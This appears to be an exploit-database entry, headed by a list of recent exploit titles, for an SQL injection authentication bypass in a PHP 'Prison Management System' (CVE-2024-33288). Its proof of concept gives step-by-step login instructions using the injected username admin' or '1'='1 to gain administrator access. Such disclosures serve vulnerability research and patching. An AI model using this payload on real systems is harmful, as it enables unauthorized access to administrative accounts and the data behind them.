
10 changes to exploits/shellcodes/ghdb CrushFTP < 11.1.0 - Directory Traversal Apache mod_proxy_cluster - Stored XSS CE Phoenix Version 1.0.8.20 - Stored XSS Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS) Prison Management System - SQL Injection Authentication Bypass PyroCMS v3.0.1 - Stored XSS Plantronics Hub 3.25.1 - Arbitrary File Read
14 lines
No EOL
583 B
Text
14 lines
No EOL
583 B
Text
# Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass
|
||
# Date: 15/03/2024
|
||
# Exploit Author: Sanjay Singh
|
||
# Vendor Homepage: https://www.sourcecodester.com
|
||
# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html
|
||
# Tested on: Windows ,XAMPP
|
||
# CVE : CVE-2024-33288
|
||
|
||
|
||
# Proof of Concept:
|
||
Step 1-Visit http://localhost/prison/
|
||
Step 2 - Click on Admin Dashboard button and redirect on login page.
|
||
Step 3– Enter username as admin' or '1'='1 and password as 123456
|
||
Step 4 – Click sing In and now you will be logged in as admin. |